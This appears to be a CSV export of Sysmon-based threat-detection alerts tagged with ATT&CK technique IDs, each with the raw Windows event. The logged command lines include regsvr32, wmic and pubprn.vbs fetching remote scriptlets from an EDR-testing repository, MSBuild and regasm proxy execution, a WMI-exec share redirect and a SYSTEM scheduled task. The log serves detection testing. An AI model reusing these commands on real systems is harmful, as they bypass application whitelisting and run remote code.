[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
421218
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.428
747F3D96-75D1-5F8B-0000-00109EB23300
2628
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
421218
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.428
747F3D96-75D1-5F8B-0000-00109EB23300
2628
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
4939
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:53.759
747F3D96-6641-5D3F-0000-0010A38C8A00
4260
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
4939
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:53.759
747F3D96-6641-5D3F-0000-0010A38C8A00
4260
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
311365
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-09 22:00:45.576
747F3D96-938D-5F07-0000-001043A84500
7976
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\Windows\system32\cmd.exe"
C:\Users\IEUser\
MSEDGEWIN10\IEUser
747F3D96-86FA-5F07-0000-00204A8B0600
0x68b4a
2
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-86FC-5F07-0000-00101E4B0700
2356
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1,"
1
5
4
1
0
0x8000000000000000
4936
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:49.535
747F3D96-663D-5D3F-0000-00106F608A00
3240
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966382
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:48:33.639
365ABB72-55A1-5C91-0000-0010D6960700
2368
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1,"
1
5
4
1
0
0x8000000000000000
22013
Microsoft-Windows-Sysmon/Operational
DC1.insecurebank.local
technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories
2019-05-19 17:32:00.478
DFAE8213-9310-5CE1-0000-0010EABA0A00
2728
C:\Windows\System32\attrib.exe
6.3.9600.16384 (winblue_rtm.130821-1623)
Attribute Utility
Microsoft® Windows® Operating System
Microsoft Corporation
attrib +h nbtscan.exe
c:\ProgramData\
insecurebank\Administrator
DFAE8213-9133-5CE1-0000-0020CC660500
0x566cc
2
High
SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02
DFAE8213-91CC-5CE1-0000-0010BEF40600
3408
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4934
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-29 21:33:44.949
747F3D96-6638-5D3F-0000-001067BA8900
4288
C:\Windows\System32\regsvr32.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49829
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1,"
1
5
4
1
0
0x8000000000000000
4933
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:45.332
747F3D96-6639-5D3F-0000-001074F48900
208
C:\Windows\System32\calc.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Calculator
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\calc.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
747F3D96-6638-5D3F-0000-001067BA8900
4288
C:\Windows\System32\regsvr32.exe
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1,"
1
5
4
1
0
0x8000000000000000
4931
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:44.622
747F3D96-6638-5D3F-0000-001067BA8900
4288
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-6638-5D3F-0000-00103DA88900
1652
C:\Windows\System32\cmd.exe
cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4931
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:44.622
747F3D96-6638-5D3F-0000-001067BA8900
4288
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-6638-5D3F-0000-00103DA88900
1652
C:\Windows\System32\cmd.exe
cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4931
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:44.622
747F3D96-6638-5D3F-0000-001067BA8900
4288
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-6638-5D3F-0000-00103DA88900
1652
C:\Windows\System32\cmd.exe
cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local ) and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"
3
5
4
3
0
0x8000000000000000
32009
Microsoft-Windows-Sysmon/Operational
alice.insecurebank.local
2019-05-14 17:17:24.660
ECAD0485-F2EC-5CDA-0000-0010F1631500
4092
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
insecurebank\Administrator
tcp
true
false
10.59.4.20
alice.insecurebank.local
49584
false
10.59.4.11
DC1
389
ldap
",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local ) and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"
3
5
4
3
0
0x8000000000000000
32008
Microsoft-Windows-Sysmon/Operational
alice.insecurebank.local
2019-05-14 17:17:24.597
ECAD0485-F2EC-5CDA-0000-0010F1631500
4092
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
insecurebank\Administrator
tcp
true
false
10.59.4.20
alice.insecurebank.local
49583
false
10.59.4.11
DC1
389
ldap
",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4929
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:44.204
747F3D96-6638-5D3F-0000-00103DA88900
1652
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4929
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:44.204
747F3D96-6638-5D3F-0000-00103DA88900
1652
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"
1
5
4
1
0
0x8000000000000000
27334
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-04-25 22:19:01.724
747F3D96-B755-5EA4-0000-0010D06E2500
4484
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-3384-5EA5-0000-0020E7030000
0x3e7
0
System
SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
596
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966368
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:48:33.279
365ABB72-55A1-5C91-0000-0010AB8C0700
2112
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4926
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:39.223
747F3D96-6633-5D3F-0000-001092628900
5056
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4925
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:39.152
747F3D96-6633-5D3F-0000-001051608900
4092
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1,"
1
5
4
1
0
0x8000000000000000
5004
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:45.198
747F3D96-6675-5D3F-0000-0010AA498F00
4184
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1,"
1
5
4
1
0
0x8000000000000000
5002
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Persistence - Scheduled Task Management
2019-07-29 21:34:40.755
747F3D96-6670-5D3F-0000-0010F9148F00
7076
C:\Windows\System32\schtasks.exe
10.0.17763.1 (WinBuild.160101.0800)
Task Scheduler Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
747F3D96-6670-5D3F-0000-001099048F00
2916
C:\Windows\System32\cmd.exe
